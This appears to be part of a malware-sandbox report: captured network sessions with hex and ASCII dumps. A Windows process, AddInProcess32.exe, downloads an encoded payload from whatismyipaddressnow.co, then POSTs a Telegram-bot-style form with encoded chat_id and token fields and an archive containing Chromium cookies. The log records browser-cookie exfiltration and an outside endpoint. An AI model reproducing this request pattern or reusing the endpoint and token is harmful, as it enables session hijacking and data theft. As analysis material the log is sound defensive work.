2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 6e 66 73 37 37 33 54 66 49 51 70 31 5a 5a 78 77 5a 51 62 7a 30 44 32 63 5a 4d 42 4a 30 39 6a 58 58 32 4e 4b 66 55 46 6a 6a 43 61 78 44 2b 50 45 7a 76 55 46 73 48 45 65 31 75 30 2f 49 2f 36 4d 4f 64 32 75 6e 33 41 50 72 62 4d 66 33 74 4a 48 30 59 49 49 62 53 37 61 53 30 46 79 55 61 78 6c 42 70 45 34 6e 65 65 35 4a 76 49 74 48 62 54 4e 54 75 6c 4a 5a 4e 4c 75 31 37 55 61 49 75 46 71 7a 63 54 70 78 72 5a 39 4b 46 32 76 71 30 33 4d 36 2f 37 39 65 4c 59 56 33 45 56 70 63 61 39 35 2f 61 46 70 73 67 45 65 4b 35 64 30 32 64 39 64 50 6c 37 4c 44 6a 68 69 45 48 49 7a 32 57 62 76 68 35 44 36 4a 52 59 61 6c 58 76 46 77 57 79 6d 64 77 4e 4e 4f 62 4c 74 42 62 4b 4a 4e 74 56 4c 6c 4f 78 49 46 33 52 41 39 33 74 69 61 77 49 74 69 52 77 68 37 45 47 53 6c 75 6f 69 41 38 4f Data Ascii: nfs773TfIQp1ZZxwZQbz0D2cZMBJ09jXX2NKfUFjjCaxD+PEzvUFsHEe1u0/I/6MOd2un3APrbMf3tJH0YIIbS7aS0FyUaxlBpE4nee5JvItHbTNTulJZNLu17UaIuFqzcTpxrZ9KF2vq03M6/79eLYV3EVpca95/aFpsgEeK5d02d9dPl7LDjhiEHIz2Wbvh5D6JRYalXvFwWymdwNNObLtBbKJNtVLlOxIF3RA93tiawItiRwh7EGSluoiA8O
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 36 47 49 51 30 44 77 59 68 67 5a 51 4f 66 43 63 59 68 71 2b 65 33 64 78 73 34 44 63 73 51 33 45 39 58 76 66 36 6c 56 70 66 49 36 36 50 66 62 37 39 4e 4c 46 5a 71 70 76 2b 59 76 51 52 51 77 35 47 61 6f 2f 54 6e 7a 4d 4d 32 34 44 32 4e 6b 78 37 47 36 65 30 4c 72 50 36 36 7a 59 7a 6c 48 57 6f 64 52 30 6c 6e 6c 70 44 76 78 33 61 69 6f 36 4e 6f 6e 39 76 57 71 53 58 63 62 74 42 56 33 5a 36 2b 64 54 59 49 4b 7a 63 77 39 5a 45 48 56 31 78 62 79 7a 68 37 71 42 64 74 75 41 51 5a 39 2b 50 5a 59 75 52 32 67 66 37 37 71 6b 71 64 75 49 39 4d 32 76 31 53 39 66 2f 48 6c 74 48 53 68 36 4c 50 71 67 66 53 52 44 53 53 61 39 32 6f 50 61 70 6d 6b 44 35 6a 2b 50 79 48 2b 63 55 39 6e 67 59 7a 32 49 4d 6f 4f 72 58 6c 45 73 4e 78 6a 44 72 58 2f 31 4d 67 6b 44 66 76 33 56 45 7a 74 Data Ascii: 6GIQ0DwYhgZQOfCcYhq+e3dxs4DcsQ3E9Xvf6lVpfI66Pfb79NLFZqpv+YvQRQw5Gao/TnzMM24D2Nkx7G6e0LrP66zYzlHWodR0lnlpDvx3aio6Non9vWqSXcbtBV3Z6+dTYIKzcw9ZEHV1xbyzh7qBdtuAQZ9+PZYuR2gf77qkqduI9M2v1S9f/HltHSh6LPqgfSRDSSa92oPapmkD5j+PyH+cU9ngYz2IMoOrXlEsNxjDrX/1MgkDfv3VEzt
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 30 41 2b 67 50 38 41 41 4f 72 73 72 52 37 63 53 6e 43 74 57 6e 4c 4d 4e 41 45 6d 73 4e 75 51 5a 43 44 41 49 59 44 42 41 4c 73 41 51 4e 57 4b 74 31 59 6c 6c 51 70 36 68 41 4d 4d 41 68 67 4f 4d 41 42 69 70 52 69 78 54 6e 56 67 57 35 42 6b 46 4d 42 70 67 44 49 41 54 59 4b 77 6d 4b 57 58 44 55 2b 4d 41 78 67 50 6b 41 55 77 41 6d 4b 6a 47 53 78 64 31 58 75 70 41 6e 6b 6b 41 6b 77 47 6d 41 45 77 46 6d 4b 5a 47 72 4b 55 36 73 62 71 51 4a 78 39 67 4f 6b 41 42 51 43 48 41 44 44 56 69 32 65 72 45 36 6b 47 65 49 6f 43 5a 41 4c 4d 41 5a 67 50 4d 55 53 4e 57 53 35 31 59 66 63 67 7a 46 32 41 65 77 48 79 41 42 51 42 50 71 68 47 72 71 30 36 73 41 65 52 35 43 75 42 70 67 49 55 41 69 77 41 57 71 78 48 72 70 45 36 73 49 65 52 35 42 6d 41 4a 77 46 4b 41 5a 51 44 4c 31 59 67 Data Ascii: 0A+gP8AAOrsrR7cSnCtWnLMNAEmsNuQZCDAIYDBALsAQNWKt1YllQp6hAMMAhgOMABipRixTnVgW5BkFMBpgDIATYKwmKWXDU+MAxgPkAUwAmKjGSxd1XupAnkkAkwGmAEwFmKZGrKU6sbqQJx9gOkABQCHADDVi2erE6kGeIoCZALMAZgPMUSNWS51YfcgzF2AewHyABQBPqhGrq06sAeR5CuBpgIUAiwAWqxHrpE6sIeR5BmAJwFKAZQDL1Yg
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 47 42 79 64 67 45 4c 74 69 57 69 78 46 53 43 2b 44 71 61 67 54 54 30 53 41 72 78 79 49 70 67 36 70 46 55 49 42 31 44 76 4e 39 73 6f 4e 38 66 69 78 34 71 52 54 78 7a 56 61 47 73 34 55 41 6f 6b 6e 67 6f 55 61 45 67 55 65 67 68 38 63 52 6e 56 35 52 69 54 6b 49 70 4a 51 6b 57 66 36 4e 4a 6c 77 4c 4b 4a 51 6a 4b 45 78 56 59 54 49 43 48 6f 74 46 44 63 47 37 66 56 49 69 4d 77 5a 69 65 44 56 48 66 79 78 62 43 70 59 77 50 54 49 75 46 73 71 63 58 77 59 39 45 31 68 6a 49 61 69 62 6f 6f 77 77 55 2f 51 68 34 79 45 6f 38 6c 4b 46 51 76 48 68 34 4b 46 35 6b 77 6b 51 78 73 55 52 69 77 75 54 4a 52 41 6e 49 47 6b 58 51 62 78 68 4b 30 34 2b 47 68 2b 4a 45 2b 69 45 55 2f 57 63 6b 2b 69 47 65 39 4b 30 6f 4b 33 51 2f 6c 58 46 4f 41 35 56 7a 6b 5a 54 54 34 4a 45 7a 47 64 34 5a Data Ascii: GBydgELtiWixFSC+DqagTT0SArxyIpg6pFUIB1DvN9soN8fix4qRTxzVaGs4UAokngoUaEgUegh8cRnV5RiTkIpJQkWf6NJlwLKJQjKExVYTICHotFDcG7fVIiMwZieDVHfyxbCpYwPTIuFsqcXwY9E1hjIaiboowwU/Qh4yEo8lKFQvHh4KF5kwkQxsURiwuTJRAnIGkXQbxhK04+Gh+JE+iEU/Wck+iGe9K0oK3Q/lXFOA5VzkZTT4JEzGd4Z
2024-06-14 13:15:17 UTC	1369	IN	Data Raw: 32 47 45 59 46 2f 6d 58 7a 68 31 47 4c 49 69 33 35 48 31 31 75 46 4e 35 58 65 77 62 39 56 35 68 51 52 57 6b 42 2f 66 44 43 52 37 73 45 62 5a 59 6d 42 4f 76 39 4d 68 59 75 31 47 65 68 32 43 35 44 76 58 6b 75 4b 76 78 33 54 31 39 63 67 2b 4d 76 38 2b 4c 76 68 44 50 77 4e 6f 76 79 74 53 6d 31 2f 67 62 79 73 75 2f 50 75 35 5a 33 30 30 31 57 33 44 5a 48 2f 4c 36 36 4d 49 77 62 66 66 4a 64 76 77 6a 4d 59 2b 42 66 6a 4c 77 62 41 70 79 32 58 34 76 46 79 61 47 76 79 37 75 67 32 74 64 70 55 5a 65 41 78 57 38 36 6a 48 2f 48 47 32 38 6e 72 47 44 6b 66 71 4a 37 61 73 53 47 4c 72 74 37 6b 6c 4f 2b 42 45 48 32 51 44 33 2f 65 78 67 2b 66 37 50 4b 55 48 33 72 6c 2f 7a 6f 51 64 77 69 79 79 43 47 42 34 6e 46 43 79 4f 54 52 37 44 79 32 6f 2b 72 42 2b 30 31 4f 45 63 4c 6b 71 Data Ascii: 2GEYF/mXzh1GLIi35H11uFN5Xewb9V5hQRWkB/fDCR7sEbZYmBOv9MhYu1Geh2C5DvXkuKvx3T19cg+Mv8+LvhDPwNovytSm1/gbysu/Pu5Z3001W3DZH/L66MIwbffJdvwjMY+BfjLwbApy2X4vFyaGvy7ug2tdpUZeAxW86jH/HG28nrGDkfqJ7asSGLrt7klO+BEH2QD3/exg+f7PKUH3rl/zoQdwiyyCGB4nFCyOTR7Dy2o+rB+01OEcLkq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	188.114.96.3	443	8168	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:18 UTC	101	OUT	GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1 Host: whatismyipaddressnow.co
2024-06-14 13:15:19 UTC	613	IN	HTTP/1.1 200 OK Date: Fri, 14 Jun 2024 13:15:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQcRiQDC3k0ohSuZDcQ%2FmP5tLFTHYDByvKLbscpDdm%2FD6JTGLy8kyCtdv12Vxr5aAj03GyrWPythZxNwldRhNTCY71BP7Oz0nWRS%2F%2BDZnIoJGLtmZOl13RFFkk820tuxirvM0LdWgoxffQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 893a96a24e4d6c40-DFW alt-svc: h3=":443"; ma=86400
2024-06-14 13:15:19 UTC	756	IN	Data Raw: 34 39 37 65 0d 0a 48 34 73 49 41 41 41 41 41 41 41 41 41 38 78 64 42 33 77 55 78 66 66 66 35 43 36 58 35 46 49 76 46 39 4c 68 62 73 48 41 45 5a 42 65 6b 74 42 37 6b 39 35 43 72 36 48 44 41 61 47 48 68 4e 42 52 41 65 6b 67 53 6b 63 51 6b 43 35 46 46 42 57 6c 57 42 41 70 69 71 4b 69 4b 46 5a 51 73 57 42 42 32 6e 2f 65 33 4f 33 75 33 4d 37 75 33 65 37 63 2f 63 4c 66 6a 33 78 7a 4e 37 66 7a 39 73 31 37 62 2f 71 38 4e 32 31 37 4c 75 45 4d 48 4d 63 5a 30 62 2b 48 44 7a 6e 75 4b 4f 66 36 72 79 48 6e 2b 37 38 69 39 43 2f 61 64 69 79 61 65 7a 6e 38 41 2f 35 6f 30 42 4d 66 38 46 32 47 44 63 2b 7a 6a 78 33 76 48 44 70 2b 77 47 6a 37 6f 41 46 6a 78 6a 67 6e 32 41 66 6d 32 73 64 50 48 47 4d 66 50 73 62 65 74 48 31 6e 2b 32 6a 6e 34 4e 78 4b 55 56 48 6d 78 39 77 30 4f Data Ascii: 497eH4sIAAAAAAAAA8xdB3wUxfff5C6X5FIvF9LhbsHAEZBektB7k95Cr6HDAaGHhNBRAekgSkcQkC5FFBWlWBApiqKiKFZQsWBB2n/e3O3u3M7u3e7c/cLfj3xzN7fz9s17b/q8N217LuEMHMcZ0b+HDznuKOf6ryHn+78i9C/adiyaezn8A/5o0BMf8F2GDc+zjx3vHDp+wGj7oAFjxjgn2Afm2sdPHGMfPsbetH1n+2jn4NxKUVHmx9w0O
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 7a 31 5a 4e 54 39 43 39 39 79 55 36 33 48 71 48 79 56 38 6b 6f 59 45 61 4f 52 77 47 69 30 34 51 49 71 56 75 6b 56 5a 31 74 49 6a 38 56 37 76 6f 55 67 37 31 6e 67 55 73 48 35 4d 55 43 6a 64 4c 43 68 49 4d 5a 56 36 76 78 59 49 53 48 57 6e 57 41 52 45 69 7a 75 68 44 67 68 41 58 2f 6f 46 71 38 6f 61 49 48 2f 30 75 47 62 75 31 44 38 72 2b 4c 76 76 66 5a 48 58 55 49 36 53 35 62 2b 47 6b 55 39 31 63 35 67 44 4d 35 50 51 4f 39 77 4e 41 31 42 30 69 30 4a 61 59 73 4e 77 66 6d 4a 4b 47 6c 38 6d 62 4c 63 57 4b 4d 6a 43 36 55 46 35 79 64 35 50 69 4f 2b 65 31 66 2f 6e 39 4d 70 71 70 50 34 79 72 6e 66 74 6c 61 56 56 62 79 71 52 76 67 4f 75 39 74 50 56 4d 73 33 69 56 39 2f 71 54 64 52 55 45 39 70 7a 43 4c 49 38 59 75 66 64 4e 53 53 48 69 77 73 41 30 4a 45 35 74 4b 6f 51 Data Ascii: z1ZNT9C99yU63HqHyV8koYEaORwGi04QIqVukVZ1tIj8V7voUg71ngUsH5MUCjdLChIMZV6vxYISHWnWAREizuhDghAX/oFq8oaIH/0uGbu1D8r+LvvfZHXUI6S5b+GkU91c5gDM5PQO9wNA1B0i0JaYsNwfmJKGl8mbLcWKMjC6UF5yd5PiO+e1f/n9MpqpP4yrnftlaVVbyqRvgOu9tPVMs3iV9/qTdRUE9pzCLI8YufdNSSHiwsA0JE5tKoQ
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 64 4b 35 30 56 65 71 57 7a 37 6f 51 50 68 49 51 50 33 41 6e 6e 68 49 52 7a 37 6f 51 50 68 59 51 50 33 51 6e 6e 68 59 54 7a 37 76 48 32 6e 58 67 30 75 45 59 2f 58 42 42 2b 75 4f 42 2b 38 71 4b 51 63 4e 47 64 63 45 6c 49 77 42 38 4f 42 78 73 63 71 36 48 67 6e 4c 33 2f 44 53 54 2f 6e 49 51 65 7a 6d 6e 77 66 63 4a 4c 61 42 52 45 4a 4b 34 4a 77 6d 4e 65 52 30 38 6f 5a 33 61 77 34 31 6e 30 48 52 48 35 43 49 68 55 43 38 36 48 76 38 36 31 51 62 67 62 63 48 31 35 6a 76 7a 79 50 50 6c 6c 46 55 64 38 57 51 65 2f 31 48 4a 39 4d 54 6a 58 6b 38 39 74 77 43 70 77 2f 32 51 4d 63 61 35 32 76 64 72 39 33 62 6e 52 49 2b 63 6d 32 63 4f 62 34 58 74 7a 39 2f 63 45 77 2b 4c 68 72 70 54 78 51 74 31 6f 74 76 6b 69 55 5a 73 4c 4c 33 76 55 75 4b 45 62 46 34 77 6b 44 4b 6b 49 2f 39 Data Ascii: dK50VeqWz7oQPhIQP3AnnhIRz7oQPhYQP3QnnhYTz7vH2nXg0uEY/XBB+uOB+8qKQcNGdcElIwB8OBxscq6HgnL3/DST/nIQezmnwfcJLaBREJK4JwmNeR08oZ3aw41n0HRH5CIhUC86Hv861QbgbcH15jvzyPPllFUd8WQe/1HJ9MTjXk89twCpw/2QMca52vdr93bnRI+cm2cOb4Xtz9/cEw+LhrpTxQt1otvkiUZsLL3vUuKEbF4wkDKkI/9
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 6e 68 4f 70 77 52 79 46 43 2b 49 6d 45 51 59 50 70 58 47 75 4e 54 36 54 6f 78 53 41 44 63 43 75 51 41 4c 39 59 41 34 4e 68 2b 37 4e 37 4d 34 65 44 67 2f 77 41 4b 55 42 79 67 41 38 42 70 43 75 77 6f 45 44 44 59 68 4d 4a 41 4e 6d 65 4b 59 73 51 44 6b 41 42 30 42 35 67 41 78 4e 44 45 54 41 41 78 55 41 4b 67 49 38 44 6c 41 4a 6f 4c 4a 57 42 69 4c 68 6d 53 6f 41 56 51 47 71 41 56 51 48 71 4b 47 4a 67 53 68 34 6f 43 5a 41 4c 59 44 61 41 4a 6b 41 57 56 6f 5a 69 49 5a 6e 73 67 48 71 41 4e 51 46 71 41 64 51 58 78 4d 44 4d 66 42 41 41 34 43 47 41 49 30 41 47 67 4d 30 30 63 70 41 4c 44 7a 54 46 4b 41 5a 51 48 4f 41 46 67 41 74 56 52 69 77 47 69 31 47 30 4c 6f 35 61 79 48 55 45 47 4e 79 59 6e 4a 65 61 55 67 50 38 65 44 4d 41 6a 6c 62 41 62 51 47 61 41 50 77 42 45 42 Data Ascii: nhOpwRyFC+ImEQYPpXGuNT6ToxSADcCuQAL9YA4Nh+7N7M4eDg/wAKUBygA8BpCuwoEDDYhMJANmeKYsQDkAB0B5gAxNDETAAxUAKgI8DlAJoLJWBiLhmSoAVQGqAVQHqKGJgSh4oCZALYDaAJkAWVoZiIZnsgHqANQFqAdQXxMDMfBAA4CGAI0AGgM00cpALDzTFKAZQHOAFgAtVRiwGi1G0Lo5ayHUEGNyYnJeaUgP8eDMAjlbAbQGaAPwBEB
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 46 4b 49 38 4a 30 6f 47 48 7a 31 48 48 2f 30 67 33 4a 46 75 73 76 31 50 59 65 50 2f 6c 6a 6f 70 59 34 45 61 31 7a 6d 53 56 79 57 4f 4a 47 4a 67 53 34 6d 34 6c 43 61 76 48 35 44 6d 6d 63 4a 49 63 57 7a 68 4a 44 69 55 55 4a 49 38 43 77 4e 70 4d 68 30 42 30 6d 65 30 6f 51 55 73 73 6a 77 6e 53 67 79 5a 73 2f 73 55 65 62 61 55 4f 5a 59 64 35 6c 66 64 72 63 74 35 50 70 43 6a 39 32 44 2b 35 42 36 46 4e 73 58 75 68 6d 51 74 79 39 30 63 30 4b 31 4f 4b 49 41 42 30 6e 74 43 39 31 77 61 57 31 66 78 44 70 33 35 2b 6b 72 78 46 4b 53 63 70 33 54 56 42 47 6f 4b 69 59 79 50 4e 68 62 4e 30 6a 58 56 62 70 71 2b 74 45 76 69 6e 33 41 6c 44 65 37 74 53 4b 55 51 2b 6d 49 31 6f 42 63 52 37 51 57 78 52 4c 6d 53 69 71 68 39 4d 61 75 49 7a 68 6e 45 43 36 4e 79 59 52 70 69 7a 6b 54 Data Ascii: FKI8J0oGHz1HH/0g3JFusv1PYeP/ljopY4Ea1zmSVyWOJGJgS4m4lCavH5DmmcJIcWzhJDiUUJI8CwNpMh0B0me0oQUssjwnSgyZs/sUebaUOZYd5lfdrct5PpCj92D+5B6FNsXuhmQty90c0K1OKIAB0ntC91waW1fxDp35+krxFKScp3TVBGoKiYyPNhbN0jXVbpq+tEvin3AlDe7tSKUQ+mI1oBcR7QWxRLmSiqh9MauIzhnEC6NyYRpizkT
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 37 33 54 66 49 51 70 31 5a 5a 78 77 5a 51 62 7a 30 44 32 63 5a 4d 42 4a 30 39 6a 58 58 32 4e 4b 66 55 46 6a 6a 43 61 78 44 2b 50 45 7a 76 55 46 73 48 45 65 31 75 30 2f 49 2f 36 4d 4f 64 32 75 6e 33 41 50 72 62 4d 66 33 74 4a 48 30 59 49 49 62 53 37 61 53 30 46 79 55 61 78 6c 42 70 45 34 6e 65 65 35 4a 76 49 74 48 62 54 4e 54 75 6c 4a 5a 4e 4c 75 31 37 55 61 49 75 46 71 7a 63 54 70 78 72 5a 39 4b 46 32 76 71 30 33 4d 36 2f 37 39 65 4c 59 56 33 45 56 70 63 61 39 35 2f 61 46 70 73 67 45 65 4b 35 64 30 32 64 39 64 50 6c 37 4c 44 6a 68 69 45 48 49 7a 32 57 62 76 68 35 44 36 4a 52 59 61 6c 58 76 46 77 57 79 6d 64 77 4e 4e 4f 62 4c 74 42 62 4b 4a 4e 74 56 4c 6c 4f 78 49 46 33 52 41 39 33 74 69 61 77 49 74 69 52 77 68 37 45 47 53 6c 75 6f 69 41 38 4f 4c 4a 6f 68 Data Ascii: 73TfIQp1ZZxwZQbz0D2cZMBJ09jXX2NKfUFjjCaxD+PEzvUFsHEe1u0/I/6MOd2un3APrbMf3tJH0YIIbS7aS0FyUaxlBpE4nee5JvItHbTNTulJZNLu17UaIuFqzcTpxrZ9KF2vq03M6/79eLYV3EVpca95/aFpsgEeK5d02d9dPl7LDjhiEHIz2Wbvh5D6JRYalXvFwWymdwNNObLtBbKJNtVLlOxIF3RA93tiawItiRwh7EGSluoiA8OLJoh
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 30 44 77 59 68 67 5a 51 4f 66 43 63 59 68 71 2b 65 33 64 78 73 34 44 63 73 51 33 45 39 58 76 66 36 6c 56 70 66 49 36 36 50 66 62 37 39 4e 4c 46 5a 71 70 76 2b 59 76 51 52 51 77 35 47 61 6f 2f 54 6e 7a 4d 4d 32 34 44 32 4e 6b 78 37 47 36 65 30 4c 72 50 36 36 7a 59 7a 6c 48 57 6f 64 52 30 6c 6e 6c 70 44 76 78 33 61 69 6f 36 4e 6f 6e 39 76 57 71 53 58 63 62 74 42 56 33 5a 36 2b 64 54 59 49 4b 7a 63 77 39 5a 45 48 56 31 78 62 79 7a 68 37 71 42 64 74 75 41 51 5a 39 2b 50 5a 59 75 52 32 67 66 37 37 71 6b 71 64 75 49 39 4d 32 76 31 53 39 66 2f 48 6c 74 48 53 68 36 4c 50 71 67 66 53 52 44 53 53 61 39 32 6f 50 61 70 6d 6b 44 35 6a 2b 50 79 48 2b 63 55 39 6e 67 59 7a 32 49 4d 6f 4f 72 58 6c 45 73 4e 78 6a 44 72 58 2f 31 4d 67 6b 44 66 76 33 56 45 7a 74 34 64 35 4c Data Ascii: 0DwYhgZQOfCcYhq+e3dxs4DcsQ3E9Xvf6lVpfI66Pfb79NLFZqpv+YvQRQw5Gao/TnzMM24D2Nkx7G6e0LrP66zYzlHWodR0lnlpDvx3aio6Non9vWqSXcbtBV3Z6+dTYIKzcw9ZEHV1xbyzh7qBdtuAQZ9+PZYuR2gf77qkqduI9M2v1S9f/HltHSh6LPqgfSRDSSa92oPapmkD5j+PyH+cU9ngYz2IMoOrXlEsNxjDrX/1MgkDfv3VEzt4d5L
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 50 38 41 41 4f 72 73 72 52 37 63 53 6e 43 74 57 6e 4c 4d 4e 41 45 6d 73 4e 75 51 5a 43 44 41 49 59 44 42 41 4c 73 41 51 4e 57 4b 74 31 59 6c 6c 51 70 36 68 41 4d 4d 41 68 67 4f 4d 41 42 69 70 52 69 78 54 6e 56 67 57 35 42 6b 46 4d 42 70 67 44 49 41 54 59 4b 77 6d 4b 57 58 44 55 2b 4d 41 78 67 50 6b 41 55 77 41 6d 4b 6a 47 53 78 64 31 58 75 70 41 6e 6b 6b 41 6b 77 47 6d 41 45 77 46 6d 4b 5a 47 72 4b 55 36 73 62 71 51 4a 78 39 67 4f 6b 41 42 51 43 48 41 44 44 56 69 32 65 72 45 36 6b 47 65 49 6f 43 5a 41 4c 4d 41 5a 67 50 4d 55 53 4e 57 53 35 31 59 66 63 67 7a 46 32 41 65 77 48 79 41 42 51 42 50 71 68 47 72 71 30 36 73 41 65 52 35 43 75 42 70 67 49 55 41 69 77 41 57 71 78 48 72 70 45 36 73 49 65 52 35 42 6d 41 4a 77 46 4b 41 5a 51 44 4c 31 59 67 39 6f 55 36 Data Ascii: P8AAOrsrR7cSnCtWnLMNAEmsNuQZCDAIYDBALsAQNWKt1YllQp6hAMMAhgOMABipRixTnVgW5BkFMBpgDIATYKwmKWXDU+MAxgPkAUwAmKjGSxd1XupAnkkAkwGmAEwFmKZGrKU6sbqQJx9gOkABQCHADDVi2erE6kGeIoCZALMAZgPMUSNWS51YfcgzF2AewHyABQBPqhGrq06sAeR5CuBpgIUAiwAWqxHrpE6sIeR5BmAJwFKAZQDL1Yg9oU6
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 67 45 4c 74 69 57 69 78 46 53 43 2b 44 71 61 67 54 54 30 53 41 72 78 79 49 70 67 36 70 46 55 49 42 31 44 76 4e 39 73 6f 4e 38 66 69 78 34 71 52 54 78 7a 56 61 47 73 34 55 41 6f 6b 6e 67 6f 55 61 45 67 55 65 67 68 38 63 52 6e 56 35 52 69 54 6b 49 70 4a 51 6b 57 66 36 4e 4a 6c 77 4c 4b 4a 51 6a 4b 45 78 56 59 54 49 43 48 6f 74 46 44 63 47 37 66 56 49 69 4d 77 5a 69 65 44 56 48 66 79 78 62 43 70 59 77 50 54 49 75 46 73 71 63 58 77 59 39 45 31 68 6a 49 61 69 62 6f 6f 77 77 55 2f 51 68 34 79 45 6f 38 6c 4b 46 51 76 48 68 34 4b 46 35 6b 77 6b 51 78 73 55 52 69 77 75 54 4a 52 41 6e 49 47 6b 58 51 62 78 68 4b 30 34 2b 47 68 2b 4a 45 2b 69 45 55 2f 57 63 6b 2b 69 47 65 39 4b 30 6f 4b 33 51 2f 6c 58 46 4f 41 35 56 7a 6b 5a 54 54 34 4a 45 7a 47 64 34 5a 53 7a 42 6d Data Ascii: gELtiWixFSC+DqagTT0SArxyIpg6pFUIB1DvN9soN8fix4qRTxzVaGs4UAokngoUaEgUegh8cRnV5RiTkIpJQkWf6NJlwLKJQjKExVYTICHotFDcG7fVIiMwZieDVHfyxbCpYwPTIuFsqcXwY9E1hjIaiboowwU/Qh4yEo8lKFQvHh4KF5kwkQxsURiwuTJRAnIGkXQbxhK04+Gh+JE+iEU/Wck+iGe9K0oK3Q/lXFOA5VzkZTT4JEzGd4ZSzBm
2024-06-14 13:15:19 UTC	1369	IN	Data Raw: 46 2f 6d 58 7a 68 31 47 4c 49 69 33 35 48 31 31 75 46 4e 35 58 65 77 62 39 56 35 68 51 52 57 6b 42 2f 66 44 43 52 37 73 45 62 5a 59 6d 42 4f 76 39 4d 68 59 75 31 47 65 68 32 43 35 44 76 58 6b 75 4b 76 78 33 54 31 39 63 67 2b 4d 76 38 2b 4c 76 68 44 50 77 4e 6f 76 79 74 53 6d 31 2f 67 62 79 73 75 2f 50 75 35 5a 33 30 30 31 57 33 44 5a 48 2f 4c 36 36 4d 49 77 62 66 66 4a 64 76 77 6a 4d 59 2b 42 66 6a 4c 77 62 41 70 79 32 58 34 76 46 79 61 47 76 79 37 75 67 32 74 64 70 55 5a 65 41 78 57 38 36 6a 48 2f 48 47 32 38 6e 72 47 44 6b 66 71 4a 37 61 73 53 47 4c 72 74 37 6b 6c 4f 2b 42 45 48 32 51 44 33 2f 65 78 67 2b 66 37 50 4b 55 48 33 72 6c 2f 7a 6f 51 64 77 69 79 79 43 47 42 34 6e 46 43 79 4f 54 52 37 44 79 32 6f 2b 72 42 2b 30 31 4f 45 63 4c 6b 71 7a 79 63 33 Data Ascii: F/mXzh1GLIi35H11uFN5Xewb9V5hQRWkB/fDCR7sEbZYmBOv9MhYu1Geh2C5DvXkuKvx3T19cg+Mv8+LvhDPwNovytSm1/gbysu/Pu5Z3001W3DZH/L66MIwbffJdvwjMY+BfjLwbApy2X4vFyaGvy7ug2tdpUZeAxW86jH/HG28nrGDkfqJ7asSGLrt7klO+BEH2QD3/exg+f7PKUH3rl/zoQdwiyyCGB4nFCyOTR7Dy2o+rB+01OEcLkqzyc3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	54306	188.114.96.3	443	8168	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-14 13:15:27 UTC	202	OUT	POST /API/FETCH/getcountry.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828 Host: whatismyipaddressnow.co Content-Length: 3035 Connection: Keep-Alive
2024-06-14 13:15:27 UTC	1024	OUT	Data Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 33 39 39 33 32 34 38 31 36 36 35 38 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 63 47 31 6a 54 30 56 78 52 46 51 78 56 32 46 79 63 6a 5a 4a 61 32 64 77 4b 31 6b 77 64 7a 30 39 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 33 39 39 33 32 34 38 31 36 36 35 38 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 6a 6c 48 57 47 4e 4c 55 54 4e 79 4b 30 6c 58 4c 33 42 48 52 30 64 52 59 33 5a 6d 55 58 70 6d 55 48 42 50 64 7a 68 4e 4d 56 49 Data Ascii: -----TelegramBotAPI_638539932481665828Content-Disposition: form-data; name="chat_id"cG1jT0VxRFQxV2FycjZJa2dwK1kwdz09-----TelegramBotAPI_638539932481665828Content-Disposition: form-data; name="token"cjlHWGNLUTNyK0lXL3BHR0dRY3ZmUXpmUHBPdzhNMVI
2024-06-14 13:15:27 UTC	2011	OUT	Data Raw: 00 08 00 98 a2 ce 58 2c e1 37 db f5 00 00 00 5f 01 00 00 14 00 00 00 43 68 72 6f 6d 69 75 6d 2f 43 6f 6f 6b 69 65 73 2e 74 78 74 85 cf 4b 72 82 30 00 80 e1 75 9c f1 28 a1 09 31 3c 16 2e b0 01 24 20 52 1e a2 6e 3a 2d 42 50 52 52 69 05 a7 a7 ef 4c 0f 60 ff 03 7c 33 bf 26 94 12 b2 d6 2a f5 01 f2 b4 70 c1 13 f0 9c 28 73 01 26 64 41 28 b5 29 b1 30 c1 96 89 00 4e 5e b9 93 02 1d e9 04 62 04 11 85 c8 9a cf 96 8f 9a cf b4 07 3e 35 4c d3 32 ff 7c 5b c7 20 0e 18 a0 18 2f d5 50 65 41 af 8e ab 77 23 1b 26 94 9c 92 4d 5c 47 7e f8 55 8b 26 3a c3 ef 97 7e 3c b7 8a b6 21 df 87 2c 16 a8 db 07 49 df e4 d5 6d da d1 c1 4c af 97 dc b2 c9 67 e9 73 cf ec 64 78 95 a7 95 ba 2c 06 c6 c7 7b e3 49 c1 b6 cf 55 69 bf 85 ac 2f ec 9f 